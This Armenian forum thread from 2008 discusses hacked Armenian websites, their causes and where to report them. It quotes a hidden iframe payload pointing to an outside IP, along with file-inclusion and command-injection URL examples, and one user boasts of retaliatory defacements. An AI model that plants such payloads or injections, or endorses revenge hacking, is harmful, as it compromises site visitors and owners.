Դիտել ողջ տարբերակը : Նենգորդների զոհ դարձած հայկական կայքեր
Պարբերաբար հանդիպում եմ վարկաբեկված (հաք արած) հայկական կայքերի։
Այս թեմայում կարող ենք տեղադրել այդ կայքերի ցուցակը այն նպատակով որ այդ կայքերի տերերը ուղղեն իրենց կայքերը և հասարակ մարդիկ զգույշ լինեն այդ կայքերը այցելելիս։
Վարկաբեկված կայքերի մեծ մասը «նորմալ» բացվում է, սակայն այդ կայքի կոդի մեջ վիրուս կամ տրոյան է տեղադրված լինում։
Ահա երկու հատ այդպիսի կայք՝
_http://www.syuniacyerkir.am
_http://www.armeniantextile.com
hacker - կարծեմ թարգմանվում է "ցանցահեն" :)
marshrut.info
էդ երբվանի՞ց
Մոդերատորական. գրառումը ջնջվել է, ժամանակավրեպ լինելու համար: Եթե թեման գնա այն ուղղությամբ, որ այստեղ պիտի ինչ-որ կայքեր խայտառակելու համար անուններ դրվեն, ապա թեման միանշանակ կջնջվի: Թեման կարող է պահվել միայն այն դեպքում, եթե պրակտիկան ցույց տա, որ այստեղից վնասված կայքերին օգնողներ (օգնություն) կա, անունները նշվում են բարի նպատակներով՝ ադմինիստրատորներին վնասի մասին տեղյակ պահելու համար:
hacker - կարծեմ թարգմանվում է "ցանցահեն" :)
Շատ անհաջող թարգմանություն է իմիջայլոց, բառի/երևույթի էության հետ անծանոթի թարգմանությունն է։
Սյունյաց երկիրը (http://www.syuniacyerkir.am/) էլ վարակված չի։
_http://www.armeniantextile.com/
_http://www.extremal.am/
դեռ վարակված են։
_http://www.meteo.am/ նույնպես նենգորդների զոհ դարձավ։
Այս պահին զոհերի ցուցակում երեք հատ հայկական կայք կա՝
_http://www.armeniantextile.com/
_http://www.extremal.am/
_http://www.meteo.am/
_http://www.extremal.am/ և _http://www.meteo.am/ էլ վարակված չեն։
Ներկա պահին վարակված են հետևյալ հայկական կայքերը՝
_http://www.armeniantextile.com/
_http://www.mlm.am/
Ժողովուրդ ջան ըտենց միք մատնացույց արեք կայքերը , եթե ուզում եք իմանալ համարյա բոլոր կայքերն էլ դառել են ու դառնում են նենգորդների զոհերը , ուղակի , որ կայքի webmaster -ը , որ ակտիվ ու ուշադիր է արագ վերացնում է կայքի էջերի մեջ ներդրված վիրուս բերող կոդը :B ու մտնելիս մենք չենք նկատում :
Էդ ավելի շատ մեղավոր են այդ կայքերի hosting տվողները , որոնց մոտ ավելի շատ են նենգորդները հաջողության հասնում , հետո կայքը պատրաստողները .
Էդ ավելի շատ մեղավոր են այդ կայքերի hosting տվողները , որոնց մոտ ավելի շատ են նենգորդները հաջողության հասնում , հետո կայքը պատրաստողները .
Տենց բան չկա: Մեր հոստինգը կյանքում չի վարակվել, բայց վրայի սայթերը պարբերաբար ու հաճախակի «կոտրել» են: Էդ ծուռ գրած սայթերն են վարկյանական կոտրվում: Որ ֆիրմային սայթ ա պետք գալիս, իսկ իրանք պրոֆեսիոնալ վեբ ծրագրավորողի դիմելու փոխարեն տալիս են մեկի հորքուրի տղուն, որն էլ իր հերթին մի հատ շաբլոն ա քաշում, ու վրեն սայթ հավաքում:
Լավ գրած սայթը չի կոտրվում:
Ներկա պահին նենգորդների զոհ են դարձել՝
_http://www.armeniantextile.com/
_http://www.mlm.am/
_http://www.organic.am/
Ժողովուրդ ջան ըտենց միք մատնացույց արեք կայքերը ,ուղակի , որ կայքի webmaster -ը , որ ակտիվ ու ուշադիր է արագ վերացնում է կայքի էջերի մեջ ներդրված վիրուս բերող կոդը :B ու մտնելիս մենք չենք նկատում :
Մատնացույց ենք անում են կայքերը որ երկար են վարաքված, շաբաթից ավել։ Ու ոչ մի խնդիր դրանում չեմ տեսնում։
Ավելին պետք է նորմալ համակարգ մշակել տենց դեպքերին արձագանքելու համար, ցավոք սրտի մեր CERT-ը չի գործում։
եթե ուզում եք իմանալ համարյա բոլոր կայքերն էլ դառել են ու դառնում են նենգորդների զոհերը
век живи, век учись..
Կկսիսվե՞ս աղբյուրներով որտեղ նշված կլինի որ կաքերի 70%-ից ավելը (համարյա բոլորը դա 95% ավել է, բայց չմանրանանք) գոնե մեկ անգամ «ջարդվել» են։
Էդ ավելի շատ մեղավոր են այդ կայքերի hosting տվողները , որոնց մոտ ավելի շատ են նենգորդները հաջողության հասնում , հետո կայքը պատրաստողները
Տենց դեպքեր իհարկե լինում են, բայց կազմում են փոքրամասնություն ու հազիվ թե 5% գերազանցեն։
Օրինակի համար վերջին մի կես տարվա մեջ, մի 5-6 վարաքված կայքի դեպքով եմ զբաղվել, 4 դեպքում տրոյանները գաղտնաբառեռն էին գողացել, 2 դեպքում էլ գաղտաբառը-գազտնաբառ չեր։ Ինչքան պատշպանված հոսթինգ համակարգ ուզում ես մշակի, ինչքան ոււզում ես պաշտպավնած կայք նախագծի եթե գաղտնաբառը 111, qwerty կամ դոմեյնի անունn է դրա բանը վաղ թե ուշ գալու է, ու ավելի շուտ քան ուշ։ :)
Իսկ ես թեմայի իմաստը չեմ հասկանում... նրա տված օգուտը:
Եթե ուղղակի էստեղ նշում ենք այդ կայքերի մասին, ապա կայքերի տերերին դրանից ի՞նչ օգուտ: Ու ըստ էության դառնում է ինչ որ «ամոթանքի հարթակ»: Չգիտեմ, թեմայի տված օգուտը չեմ տեսնում:
Տենց բան չկա: Մեր հոստինգը կյանքում չի վարակվել, բայց վրայի սայթերը պարբերաբար ու հաճախակի «կոտրել» են: Էդ ծուռ գրած սայթերն են վարկյանական կոտրվում: Որ ֆիրմային սայթ ա պետք գալիս, իսկ իրանք պրոֆեսիոնալ վեբ ծրագրավորողի դիմելու փոխարեն տալիս են մեկի հորքուրի տղուն, որն էլ իր հերթին մի հատ շաբլոն ա քաշում, ու վրեն սայթ հավաքում:
Լավ գրած սայթը չի կոտրվում:
Նախ ասեմ , որ կայքերի վիրուսով վարաքվելը իրենից ներկայացնում է 90% - ով կայքի index կամ այլ կարևոր ֆայլերի օրինակ login.php մեջ ինչ-որ ,HTML , JavaScript կամ այլ կոդի ներդնում օրինակ`
<iframe src='http://216.227.223.57/pe.php' width='1' height='1' style='visibility:hidden;'></iframe>
, որը աշխատում է այդ էջը կանչելիս , ու ըստ քեզ ոնց կարելի է դա անել եթե նենգորդը չունենա ftp դոստուպ , իսկ ftp դոստուպ ունենալ նշանակումե հոստինգի 21port- ի հետ խաղեր անել կամ user-ի login password-ը ունենալ , որոնցից առաջինը ավելի հեշտ է սխալ ու ոչ պրոֆեսիոնալ նաստռոյկա արաց serveri os-ի վրա անել քան 2-րդը , որովհետև նույնիսք vBulletin - ի նման պռոֆ գրված ֆորումը մի 12 տառանոց login password- ով հանգիստ ջարդումեն նենգորդները ու գրում իրենց կոդերը ֆայլերի մեջ :B
ու ըստ քեզ ոնց կարելի է դա անել եթե նենգորդը չունենա ftp դոստուպ
օրինակ PHP կամ SQL injection'ներ անելով,
իսկ մասայական վարակումների համար գռվում ա worm, որը վարակում ա կոնկրետ վերսիաների կոնկրետ դվիժոկներ/ֆորումներ կոնկրետ հայտնի ծակեր օգտագործելով...
Մատնացույց ենք անում են կայքերը որ երկար են վարաքված, շաբաթից ավել։ Ու ոչ մի խնդիր դրանում չեմ տեսնում։
Ավելին պետք է նորմալ համակարգ մշակել տենց դեպքերին արձագանքելու համար, ցավոք սրտի մեր CERT-ը չի գործում։
век живи, век учись..
Կկսիսվե՞ս աղբյուրներով որտեղ նշված կլինի որ կաքերի 70%-ից ավելը (համարյա բոլորը դա 95% ավել է, բայց չմանրանանք) գոնե մեկ անգամ «ջարդվել» են։
Տենց դեպքեր իհարկե լինում են, բայց կազմում են փոքրամասնություն ու հազիվ թե 5% գերազանցեն։
Օրինակի համար վերջին մի կես տարվա մեջ, մի 5-6 վարաքված կայքի դեպքով եմ զբաղվել, 4 դեպքում տրոյանները գաղտնաբառեռն էին գողացել, 2 դեպքում էլ գաղտաբառը-գազտնաբառ չեր։ Ինչքան պատշպանված հոսթինգ համակարգ ուզում ես մշակի, ինչքան ոււզում ես պաշտպավնած կայք նախագծի եթե գաղտնաբառը 111, qwerty կամ դոմեյնի անունn է դրա բանը վաղ թե ուշ գալու է, ու ավելի շուտ քան ուշ։ :)
Հետաքրկիր է , որտեղից իմացար թե 4 դեպքում տրոյանները գաղտնաբառեռն էին գողացել , եթե գաղտնիք չի :think : Մնացածի վերաբերյալ բան չունեմ ասելու , իսկ ինչ մնումե 70% թե 95% , էդ կարևոր չի որովհետև ես ինկատի ունեի այն կայքերի " համարյա բոլորը " որոնք իսկապես նենգորդներին պետքեն , ոչ թե ամեն կայք :
Ավելացվել է 2 րոպե անց
օրինակ PHP կամ SQL injection'ներ անելով,
իսկ մասայական վարակումների համար գռվում ա worm, որը վարակում ա կոնկրետ վերսիաների կոնկրետ դվիժոկներ/ֆորումներ կոնկրետ հայտնի ծակեր օգտագործելով...
Կլինի մի քիչ ավելի մանրամասն ասես եթե կարելի է :8:
Հետաքրկիր է , որտեղից իմացար թե 4 դեպքում տրոյանները գաղտնաբառեռն էին գողացել:
հնարավոր տարբերակ, երբ ըստ web log'երի ջարդելու հետքեր չկան իսկ FTP լոգերը նայելիս երևում ա որ այլ IP'ից կպել են և փոփոխություններ կատարել :)
Կլինի մի քիչ ավելի մանրամասն ասես եթե կարելի է :8:
օրինակ երբ PHP/CGI սկրիպտին փոխանցում ես պարամետր, որը ինքը ֆիլտրացիա չի անում ու կատարում ա, օրինակ՝
շատ պարզ օրինակ
www.aaaaaaaa.am/?page=contacts.htm
www.aaaaaaaa.am/?page=index.php
կարելի է տեսնել index.php source-ը
կամ հնարավոր լինի կատարել հրաման սերվերի վրա
www.aaaaaaaa.am/?page=|ls%20-l|
Իսկ ես թեմայի իմաստը չեմ հասկանում... նրա տված օգուտը:
Եթե ուղղակի էստեղ նշում ենք այդ կայքերի մասին, ապա կայքերի տերերին դրանից ի՞նչ օգուտ: Ու ըստ էության դառնում է ինչ որ «ամոթանքի հարթակ»: Չգիտեմ, թեմայի տված օգուտը չեմ տեսնում:
Խնդիրը նրանում չի որ հայկական սայտեր ջարդվում են։ Խնդիրը նրանումա որ ջարդվելուց հետո, սայտի տերերը ամիսներ շարունակ ոչ մի բան չեն անում այդ սայտը մաքրելու համար։
Այս թեման բացեցի նրանից հետո երբ իմացանք որ ԱՄՆ-ում Հայաստանի դեսպանատան սայտում 3 ամսից ավել տրոյան էր դրած, ու սայտի տերերը ոչ մի բան չէին անում։ Այսինքն եթե սայտը ջարդվում է, գոնե սայտի տերերը պետք է սայտը միանգամից օֆֆլայն գցեն, ու սկսեն խնդրի վրա աշխատել, ոչ թե թողեն որ իրանց կայքերի վրա գրված լինի «հաքեդ բայ ազերբայաջան թիմ» ամիսներ շարունակ։
Բայց միգուցե դու ճիշտ ես որ եթե ոչ մեկ սա չի կարդում, սա էնքանել լավ տեղ չի դրա մասին խոսել։ Երևի Xelgen-ի ասած ինչ որ կենտրոնացված համակարգ է պետք այդպիսի դեպքերի համար։ Ինձ հետաքրքիրա մարդիկ ուրիշ ի՞նչ առաջարկներ ունեն։
Cannibal
14.12.2008, 21:44
ես ել իմ պատասխանը _http://www . organic . ի ջարդողներին.
աղջիկներին կխնդրեմ չնայել.
ազեները իրանց դրել են եսիմ ինչի տեղ :angry
_http://www.elcompany.net/ էլ ջարդեցին։
Բայց միգուցե դու ճիշտ ես որ եթե ոչ մեկ սա չի կարդում, սա էնքանել լավ տեղ չի դրա մասին խոսել։ Երևի Xelgen-ի ասած ինչ որ կենտրոնացված համակարգ է պետք այդպիսի դեպքերի համար։ Ինձ հետաքրքիրա մարդիկ ուրիշ ի՞նչ առաջարկներ ունեն։
Հենց ամբողջ խնդիրն այն է, որ եթե այս թեմայի արդյունքում կայքերի տերերը կիմանան ինչ է եղել, թեմայում խորհուրդներ կստանան, թե ի՞նչ է կարելի անել և այլն, ապա նորմալ կլինի: Բայց պրակտիկորեն տեսնում ենք, որ տեղադրվում է ջարդված կայքի հասցե, ապա որոշ ժամանակ անց դրվում է, որ կայքն արդեն աշխատում է կամ էլ ոչ, իսկ կայքերի տերերին սրանից օգուտ չկա, օգտագործողներին օգուտ չկա:
Հետևաբար ես մեկ օր էլ կմտածեմ ու բացառված չի, որ թեման կփակեմ:
Ավելացվել է 1 րոպե անց
ես ել իմ պատասխանը _http://www . organic . ի ջարդողներին.
աղջիկներին կխնդրեմ չնայել.
ազեները իրանց դրել են եսիմ ինչի տեղ :angry
Սրա փոխարեն եթե կայքի տերերին տեղեկացնեիր ու եթե կարող ես, խորհուրդներ տայիր, ապա հրաշալի կլիներ: Իսկ նման բանի իմաստ ընդհանրապես չեմ տեսնում:
Cannibal
14.12.2008, 22:39
Սրա փոխարեն եթե կայքի տերերին տեղեկացնեիր ու եթե կարող ես, խորհուրդներ տայիր, ապա հրաշալի կլիներ: Իսկ նման բանի իմաստ ընդհանրապես չեմ տեսնում:
իմաստը են ա որ ազեները չիմանան թե մենակ իրանք կարան.
եթե ես ձև շարունակվի կարողա ելի կիբեռպատերազմ սկսվի
իմաստը են ա որ ազեները չիմանան թե մենակ իրանք կարան.
եթե ես ձև շարունակվի կարողա ելի կիբեռպատերազմ սկսվի
Ու կարո՞ղ ես բացատրել այդ «կիբերպատերազմ» գոռոզահունչ բառի իմաստը: Ի՞նչ ես շահելու, եթե ենթադրենք 1000 հատ ադրբեջանական կայք վարի տաս, իրանք էլ ամեն մեկը 10 րոպե հետո դզեն: Քեզ շատ-շատ մնա քո ասենք ամիսների կամ շաբաթների անիմաստ աշխատանքը, որի փոխարեն կարելի էր հայկական կայքերին օգնել (եթե էդքան ժամանակ ունեք), ամրացնեք, որ չկոտրեն:
Cannibal
14.12.2008, 22:59
ես ետ ամեն ինչը անելուց ամենակարևորը՝գիտելիք եմ ստանում.ետա իմ նպատակը մեկ ել միքիչ կայֆ…
եթե տեղյակ չես ասեմ իմացի որ երկու հազար թվի յաները շատ մի հզոր կիբեռպատերազմ ա եղել հայաստանի ու ազերի մեջ ու հայաստանի անունը շատ բարձր ա պահել մի հատ հայ հակերների թիմ անունը չեմ հիշում արդեն…իհարկե հետո ետ թմի անդամները անհայտ կորան …Դ բայց դե զաթո մեր հայ հակերների անունը բարձր պահին
հիմա համարյա լյուբոյ մարդու հետ որ խոսում ես հակինգից,ասում ա խի հայաստանում հակեր կա՞միքիչ անուն ա պետք հանել
դե պարզա ըստեղ հակեր գրելով ինկատի ունեմ լամեռ թեչե ուր ա մեզ բախտ իսկականից հակեր ունենայինք
Cannibal, անտիհակերներ ունենալուց կուրախանամ, հակերներ ունենալուց՝ հակառակը: Կիբերպատերազմն էլ սկվի, տխուր դեմքով կասեմ «գնացին հավասարվեցին իրանց մարդկային մակարդակին» ;)
ես ետ ամեն ինչը անելուց ամենակարևորը՝գիտելիք եմ ստանում.ետա իմ նպատակը մեկ ել միքիչ կայֆ…
Գիտելիքը կաևոր է, բայց նաև կարևոր թ թե ինչ աղբյուրից ես այն ստանում:) Իսկ եթե լավ մտածես, միգուցե դրանք ընդամենը ինքնահաստատման փորձեր են;)
Երևի Xelgen-ի ասած ինչ որ կենտրոնացված համակարգ է պետք այդպիսի դեպքերի համար։ Ինձ հետաքրքիրա մարդիկ ուրիշ ի՞նչ առաջարկներ ունեն։
http://cert.am/
http://cert.am/report_incident.html
http://cert.am/
http://cert.am/report_incident.html
Շնորհակալություն։ Ես չէի իմանում սրա մասին։ Կուղարկեմ բոլոր ջարդած կայքերը իրենց։ Եթե այսպսի բան կա, երևի կարելի է այս թեման փակել։
Շնորհակալություն։ Ես չէի իմանում սրա մասին։ Կուղարկեմ բոլոր ջարդած կայքերը իրենց։ Եթե այսպսի բան կա, երևի կարելի է այս թեման փակել։
Խնդրեմ, միգուցե Ձեր միջոցով այնտեղ ակտիվացում մցնելուց հետո կարող ա վերջապես cert.am-ը իր իրական նաշանակությամբ ծառայել այլ ոչ թե լինել ուղղակի լինելու համար :)
ՀԳ թեման որոշ ժաման անց կփակվի
Cannibal
15.12.2008, 10:10
Cannibal, անտիհակերներ ունենալուց կուրախանամ, հակերներ ունենալուց՝ հակառակը: Կիբերպատերազմն էլ սկվի, տխուր դեմքով կասեմ «գնացին հավասարվեցին իրանց մարդկային մակարդակին» ;)
մարդիկ տարբեր մտածելակերպ ունեն.իսկ հավասարվելու հետ ետքան ել համաձայն չեմ.պրոստո իրանց պետք ա ցույց տրվի որ մենք ել կարանք ու եթե պետք լինի կանենք բայց Չենք անում.այ եթե մենք սկսեինք եդ ուրիշ բան
Գիտելիքը կաևոր է, բայց նաև կարևոր թ թե ինչ աղբյուրից ես այն ստանում Իսկ եթե լավ մտածես, միգուցե դրանք ընդամենը ինքնահաստատման փորձեր են
աղբյուրը ավելի լավ ա որ ոչ միայն գրքերից ստանաս այլ նաև ինքնուրույն պրակտիկա ունենաս.ամեն ինչ չի որ գրքով պիտի սովորես. ես չեմ ուզում ինքնահաստատվեմ.ես ինքս հակերների թմի մեջ կամ ու իմ իսկական ածականը ոչ մեկը չգիտի.ետ թմով դեռ մի հատ ազեռական սայթ ա ջարդվել պրոստո հիմա անդամները շաատ զբաղված են դրա համար չենք սկսում.իմ իսկական ածականը ոչ մեկտ չգիտեք.իսկ Կաննիբալ ածականս ես չեմ ուզում հաստատեմ որպես "հայտնի" լամեռ քանի որ ես ածականը ինձ արդեն հարազատ ա :scen
Նախ ասեմ , որ կայքերի վիրուսով վարաքվելը իրենից ներկայացնում է 90% - ով կայքի index կամ այլ կարևոր ֆայլերի օրինակ login.php մեջ ինչ-որ ,HTML , JavaScript կամ այլ կոդի ներդնում օրինակ`
<iframe src='http://216.227.223.57/pe.php' width='1' height='1' style='visibility:hidden;'></iframe>
, որը աշխատում է այդ էջը կանչելիս , ու ըստ քեզ ոնց կարելի է դա անել եթե նենգորդը չունենա ftp դոստուպ , իսկ ftp դոստուպ ունենալ նշանակումե հոստինգի 21port- ի հետ խաղեր անել կամ user-ի login password-ը ունենալ , որոնցից առաջինը ավելի հեշտ է սխալ ու ոչ պրոֆեսիոնալ նաստռոյկա արաց serveri os-ի վրա անել քան 2-րդը , որովհետև նույնիսք vBulletin - ի նման պռոֆ գրված ֆորումը մի 12 տառանոց login password- ով հանգիստ ջարդումեն նենգորդները ու գրում իրենց կոդերը ֆայլերի մեջ :B
Ավելի շատ հոստինգի վրայի ծակ սայթով են մտնում ՕՀ-ը վարակում, քան ՕՀ-ի ծակով՝ կայքերը:
օրինակ երբ PHP/CGI սկրիպտին փոխանցում ես պարամետր, որը ինքը ֆիլտրացիա չի անում ու կատարում ա, օրինակ՝
շատ պարզ օրինակ
www.aaaaaaaa.am/?page=contacts.htm
www.aaaaaaaa.am/?page=index.php
կարելի է տեսնել index.php source-ը
Դժվար , իմ կարծիքով սենց չես կարա իմ ասած ձևով ինչ որ վիրուս կանչող կոդ ավելացնես կայքի էջերի source - մեջ դրա համար վսյոտկի ftp- է պետք :
կամ հնարավոր լինի կատարել հրաման սերվերի վրա
www.aaaaaaaa.am/?page=|ls%20-l|
Իսկ էս դեպքի հավանական լինելու համար նախ պետքա որ էտ կայքի տերը հոստինգ տվողը լինի , որովհետև մյուսները բոլորնել user-ի կարգավիճակով են ու շատ քիչ հրամանների իրավունք ունեն իրենց կոդում օգտագործելու , համել cgi կամ php նախագծերից շատ քչերն են ըտենց բան օգտագործում կոդի մեջ դրանքել հիմնականում շատ պռոֆ ծրագրերն են որոնք հաստատ GET-ով եկած փոփխականին հազար տեսակի ֆիլտրեր են անում :) :
Իմ կարծիքով կարելի է խակերներին հարցնել եթե ցանկություն ունեն էստեղ մի քիչ կիսֆեն իրենց հնարքներով կապված կոդերում ինչ-որ բան ավելավնելու հետ ;) :
օրինակ երբ PHP/CGI սկրիպտին փոխանցում ես պարամետր, որը ինքը ֆիլտրացիա չի անում ու կատարում ա|
:) ուհու
Cannibal> И имя их было Леги.. в смысле Liazor team :) Մնացածի առումով համաձայն եմ Chuk-ի գրածների հետ, կամ էլ թե հակ ես անում, լուրջ ռեսուրս պետք է հակ անես, ու լուրջ հակես։ Կարո՞ղ ես օրինակ Ալիևի և Մելի Մեջլիսի կայքը աննկատ ջարդես ու օֆֆիցիալ հրապարակումների մեջ ավելացնես որ ճանաչում ես ԼՂՀ անկախությունը, հետո էլ վերցնես օպոզիցիոն ռեսուրսի վրա նշես թե ժողովորդ ոտքի ելեք, հողերը հանձնին, զինված պայքար իշխանություններին, բայկոտ-մայկոտ արեք։ Կարճ ասած լուրջ մտածբած տեղեկատվական ջարդ պետք է լինի, ինչ որ խեղճ ու կրակ ֆորումներ/հոմփեյջեր ջարդելը անիմաստ, անվայել ու կոնրտպրոդուկտիվ է։
Tom> Network.am-y արդեն պատասխանեց, լոգ-երը հետազոտելով և տեսնելով, որ առանձ բրուտֆորցի, ինչ-որ փախած երկրի ԻՊ-ից ֆտպ-ով միանում էին, հետո էլ կազմակերպության «ադմինին» ես գրում, պարզվում է որ օրինակ անտիվիրուսները մի մեկուկես տարի չեն թարմացվում, որորվհետև «անիմաստ է դրա վրա ժամանակ կրոցնել, ինքը ՕՀի իմիջի ունի, երբ վիրուսները շատանում են, ինքը վերցնում նորից համակարգը քցում է ետ իմիջից» կամ էլ ինքդ ես գնում նրանց մոտ, ու անզեն աչքով տեսնում ես մի մեծ գազանանոց ամեն մի կոմպի վրա։
Բացի դրանից կան շատ տարբերակներ հենց կայքի սկրիպտերի սխալների միջոցով փոփոխություննր անել, գուգլիր օրինակ «MySQL injection»։
Network.am, Սահակ> Հենց դրա մասին էի գրում, որ մեր CERT-ը մեռած է՝ չի գործում։ Ես նրանց ես ամառ մերա հեք-ռեպօռտ ուղղարկելով, կասկածում եմ որ մեկը տեսել է, էլ չեմ ասում արձագանքելու մասին։ Ինչքան ինձ է հասել «երեխեքին են փոխանցել» երեխեքն էլ խաղացին մի քիչ երևի ու ձանձրացան :)
Այստեղ պետք է մի անգամ էլ բերեմ վրացական ՑԵՌՏ-ի օրինակը։ Երբ որ պատերազմի ժամանակ Թիֆլիսից էին պետ. գործիչները փախնում, վրացական ՑԵՌՏին օգնության էին եկել-հասել Էստոնական ու (կարծեմ) Լեհական ՑԵՌՏ-ի մասանգետները։ Ետ նենց, որ լրջությունը զգացվի։
Առաջարկություններից՝ նախ հասկանալ թե ինչումն է խնդիրը մեր ՑԵՌՏի հետ, ու փորձել այն ուշքի բերել։
Ստեղծել կամավոր-էնտուզիաստ IT Sec մասնագետնորի խումբ, որոնք պարբերաբար անցկացնելու են կարևոր կայքերի աուդիտ և խնդիրների դեպքում տեղեկացնելու են կայքի/հոսթինգի/ՑՄՍ-ի պատասխանատուներին։ Թե էլ ինչ կարող է անել այդ խումբը կախված է նրանցի թե ինչքան ռեսուրց կունենանք, առնվազն արժի նաև ինչ-որ «ռեկոմենդացիաներ» հրապարակել։ Չնայած եթե ՑԵՌՏ-ը աշխատի դա նրանց գործը կլինի արդեն։
Մեկ այլ խնդիր՝ ՏՏ անվտանգությանը շատ քչերն են լուրջ վերաբերվում, երևի քանի դեռ նրանց գրպանին դա չխփի, վերաբերմունքը նույնն է մնալու։
Chuk> Նույնիս եթե որպես ամոթանք սրան վերաբերվենք (անձամբ ես որպես ամոթանք չեմ վերաբերվում ու եթե իմ պատասխանատվության տակ գտվող կայքը ստեղ կտեղադրվի ու ստեղից դրանից կտեղեկանամ, միայն շնորհակալ կլինեմ) քո կարծիքով այդ ամոթանքը որևէ մեկին հուզո՞ւմ է։ ԱՄՆ-ում հայկական դեպսանության կայքը 5-6 (!!!) ամիս վարաքված է եղել, այսցելուններին վարաքում էր, գուգլը կայքի կոզքին գրում էր որ «այս կայքը կվնասի ձեր համակարգիչը» իսկ երբ նրանց (և կարծեմ նույնից ԱԳՆ) դրա մասին գրելուց ոչ մի արձագանք չեղավ և վերջը ԶԼՄ-ներին դրա մասին տեղեկացրին ու դրանից հետո միայն կայքից տրոյանը հանեցին, ԱՄՆում դեսպանատունը դեռ երես ունեցաց ասել թե սուտ է, տենց բան չի եղել։
Նայի վերը գրվածը նրա մասին, որ անվտանգությանը լուրջ չեն վերաբերվում։
Cannibal
15.12.2008, 14:37
Cannibal> И имя их было Леги.. в смысле Liazor team Մնացածի առումով համաձայն եմ Chuk-ի գրածների հետ, կամ էլ թե հակ ես անում, լուրջ ռեսուրս պետք է հակ անես, ու լուրջ հակես։ Կարո՞ղ ես օրինակ Ալիևի և Մելի Մեջլիսի կայքը աննկատ ջարդես ու օֆֆիցիալ հրապարակումների մեջ ավելացնես որ ճանաչում ես ԼՂՀ անկախությունը, հետո էլ վերցնես օպոզիցիոն ռեսուրսի վրա նշես թե ժողովորդ ոտքի ելեք, հողերը հանձնին, զինված պայքար իշխանություններին, բայկոտ-մայկոտ արեք։ Կարճ ասած լուրջ մտածբած տեղեկատվական ջարդ պետք է լինի, ինչ որ խեղճ ու կրակ ֆորումներ/հոմփեյջեր ջարդելը անիմաստ, անվայել ու կոնրտպրոդուկտիվ է։
սրա համար բավականին երկար ժամանակ ինձ կարան նստացնեն.ես արդեն շատ լուրջ քայլ կլինի.հետն ել ես իսկական հակեր չեմ որ ցանկացած սայթ կարանամ ջարդեմ.հավես ել չկա խորանամ սեռվեռնի եքսպլոիտների մեջ
Cannibal> Դա պարզապես լուրջ հարձակման օրինակ էր, և ոչ մի դեպքում մտախաղացում կամ որևէ մեկին հակաօրինական քայլերի դրդում։
Բայց իմիջայլոց քո հիշված Լիազոր թիմը նման մի բան էր արել, կարծեմ դեյ.ազ-ում տեղադրել էին նորություն թե իբր ԼՂՀ անկախությունը ճանաչվել է, և նախագահի լրատվական ծառայությունը ստիպված էր դա պաշտոնապես հերքել։
Իսկ նստացնելը լավ ասեցիր՝ Ադրբեջանը մի շարք փաստաթխթեր է ստորագրել ՏՏ անվտանգության ապահովության մասին, մեր կողմը լավ կաներ ամեն մի ջարդված կայք միջազգային մակարդակի վրա Ադրբեջանի քթից բերեր, պահանջեր քրեկան ապատասխանատվության կանչել ազերական հաքերներին, բերեր դա որպես ադրբեջանակնա հասարակության թշնամանքի և պետական հակահայկական պրոպագանդայի ապացույցներ և այլն։
Բայց դե դա երազանքներ են.. մեր կառույցները շատ ավելի լուրջ հարցերում ոչ մի բան չեն ձեռնարկում…
Chuk> Նույնիս եթե որպես ամոթանք սրան վերաբերվենք (անձամբ ես որպես ամոթանք չեմ վերաբերվում ու եթե իմ պատասխանատվության տակ գտվող կայքը ստեղ կտեղադրվի ու ստեղից դրանից կտեղեկանամ, միայն շնորհակալ կլինեմ) քո կարծիքով այդ ամոթանքը որևէ մեկին հուզո՞ւմ է։ ԱՄՆ-ում հայկական դեպսանության կայքը 5-6 (!!!) ամիս վարաքված է եղել, այսցելուններին վարաքում էր, գուգլը կայքի կոզքին գրում էր որ «այս կայքը կվնասի ձեր համակարգիչը» իսկ երբ նրանց (և կարծեմ նույնից ԱԳՆ) դրա մասին գրելուց ոչ մի արձագանք չեղավ և վերջը ԶԼՄ-ներին դրա մասին տեղեկացրին ու դրանից հետո միայն կայքից տրոյանը հանեցին, ԱՄՆում դեսպանատունը դեռ երես ունեցաց ասել թե սուտ է, տենց բան չի եղել։
Նայի վերը գրվածը նրա մասին, որ անվտանգությանը լուրջ չեն վերաբերվում։
Լրիվ համաձայն եմ: Ուշադրություն դարձրու որ ինքս «ամոթանքի հարթակ» բառերը գրել էի չակերտների մեջ: Իմ կայքերից էլ է եղել, որ հեք են արվել ու ի տարբերություն շատերի ես այդտեղ ամոթալի բան չեմ տեսել: Ընդամենը նոր գիտելիքներ եմ ստացել, շտկել, փակել ծակերը:
Բայց այստեղ երկու ուրիշ հարց կա.
- Շատերն այլ կերպ են ընկալում այդ փաստը: Որպես օրինաը կբերեմ Cannibal-ին, այս թեմայում և երեկ մի այլ թեմայում իրա գրածները: Մասնավորապես ինքը երեկ թեմա էր բացել, որտեղ գրվել էր, որ կոտրված կայքի պատճառով «խայտառակ ենք լինում», այս թեմայում տեսնելով կոտրված կայքերի հասցեները «ամոթից» ու «խայտառակությունից փրկվելու» համար հակաքայլերի են սկսում գնալ և այլն
- Ամբողջ խնդիրն էն ա, որ ես գոնե մեկ դեպք չգիտեմ, որ այս թեմայում տեղադրված կայքի տերն այս թեմայի միջոցով իմացած լինի իր կայքի «վարակված լինելու» մասին ու շտկի այն: Այսինքն թեմայի ՕԳԳ-ն այդ իմաստով, ցավոք, ձգտում է զրոյի:
Cannibal
15.12.2008, 17:34
սկզբում ես գիտեի թե մենակ ռեալն են ջարդել ու իմ լսելով բավականին մարդ ա այցելում ետ կայքը ու դաժե ջարդելուց հետո ես չեի կարա վերաջարդեի որ առաջին էջին բան ման գրեի… իրա ադմինին ել նամակ եմ ուղարկել,որում տեղեկացնում եի դրա մասին ,բայց դե հնարավոր ա արդեն տեղյակ էր
իսկ ես թեմայում տեսա որ ազեները չափը անցան…հետն ել էլի եմ կրկնում ամեն առանձին դեպքում սայթ ջարդելը իրա հետաքրքրությունները ու դժվարությունները ունի…ետի լիքըը գիտելիք ա տալիս
ես խոսացել եմ հակերական երկու թմերի հետ ու մենք որոշել ենք ոչինչին չխառնվել.ինչքան անկապ հայկական սայթ կա թող ջարդեն.ինչքան քիչ ենքան ամուր..
- Ամբողջ խնդիրն էն ա, որ ես գոնե մեկ դեպք չգիտեմ, որ այս թեմայում տեղադրված կայքի տերն այս թեմայի միջոցով իմացած լինի իր կայքի «վարակված լինելու» մասին ու շտկի այն: Այսինքն թեմայի ՕԳԳ-ն այդ իմաստով, ցավոք, ձգտում է զրոյի:
դե թեման փակի …Դ ես ել նման բան չտեսա բայց ուրիշները տեղեկացան վիրուսոտ սայթերի մասին ու հիմա ավելի զգույշ կլինեն.
իմ կարծիքով թեման արդեն քամվավ պրծավ.
Egern.net
15.12.2008, 20:41
